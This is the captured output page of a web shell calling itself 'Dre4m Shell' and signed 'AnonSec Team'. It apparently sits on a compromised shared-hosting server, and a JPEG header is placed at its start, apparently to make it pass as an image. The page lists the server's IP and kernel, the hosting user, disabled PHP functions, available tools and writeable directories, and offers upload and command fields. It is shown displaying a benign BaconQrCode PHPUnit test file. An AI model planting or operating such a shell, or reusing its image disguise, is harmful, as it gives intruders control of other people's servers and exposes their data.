ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 13.59.192.183
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds/vendor/bacon/bacon-qr-code/tests/BaconQrCode/Common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds/vendor/bacon/bacon-qr-code/tests/BaconQrCode/Common/FormatInformationTest.php
<?php
/**
 * BaconQrCode
 *
 * @link      http://github.com/Bacon/BaconQrCode For the canonical source repository
 * @copyright 2013 Ben 'DASPRiD' Scholzen
 * @license   http://opensource.org/licenses/BSD-2-Clause Simplified BSD License
 */

namespace BaconQrCode\Common;

use PHPUnit_Framework_TestCase as TestCase;

class FormatInformationTest extends TestCase
{
    protected $maskedTestFormatInfo = 0x2bed;
    protected $unmaskedTestFormatInfo;

    public function setUp()
    {
        $this->unmaskedTestFormatInfo = $this->maskedTestFormatInfo ^ 0x5412;
    }


    public function testBitsDiffering()
    {
        $this->assertEquals(0, FormatInformation::numBitsDiffering(1, 1));
        $this->assertEquals(1, FormatInformation::numBitsDiffering(0, 2));
        $this->assertEquals(2, FormatInformation::numBitsDiffering(1, 2));
        $this->assertEquals(32, FormatInformation::numBitsDiffering(-1, 0));
    }

    public function testDecode()
    {
        $expected = FormatInformation::decodeFormatInformation(
            $this->maskedTestFormatInfo,
            $this->maskedTestFormatInfo
        );

        $this->assertNotNull($expected);
        $this->assertEquals(7, $expected->getDataMask());
        $this->assertEquals(ErrorCorrectionLevel::Q, $expected->getErrorCorrectionLevel()->get());

        $this->assertEquals(
            $expected,
            FormatInformation::decodeFormatInformation(
                $this->unmaskedTestFormatInfo,
                $this->maskedTestFormatInfo
            )
        );
    }

    public function testDecodeWithBitDifference()
    {
        $expected = FormatInformation::decodeFormatInformation(
            $this->maskedTestFormatInfo,
            $this->maskedTestFormatInfo
        );

        $this->assertEquals(
            $expected,
            FormatInformation::decodeFormatInformation(
                $this->maskedTestFormatInfo ^ 0x1,
                $this->maskedTestFormatInfo ^ 0x1
            )
        );
        $this->assertEquals(
            $expected,
            FormatInformation::decodeFormatInformation(
                $this->maskedTestFormatInfo ^ 0x3,
                $this->maskedTestFormatInfo ^ 0x3
            )
        );
        $this->assertEquals(
            $expected,
            FormatInformation::decodeFormatInformation(
                $this->maskedTestFormatInfo ^ 0x7,
                $this->maskedTestFormatInfo ^ 0x7
            )
        );
        $this->assertNull(
            FormatInformation::decodeFormatInformation(
                $this->maskedTestFormatInfo ^ 0xf,
                $this->maskedTestFormatInfo ^ 0xf
            )
        );
    }

    public function testDecodeWithMisRead()
    {
        $expected = FormatInformation::decodeFormatInformation(
            $this->maskedTestFormatInfo,
            $this->maskedTestFormatInfo
        );

        $this->assertEquals(
            $expected,
            FormatInformation::decodeFormatInformation(
                $this->maskedTestFormatInfo ^ 0x3,
                $this->maskedTestFormatInfo ^ 0xf
            )
        );
    }
}

Anon7 - 2022
AnonSec Team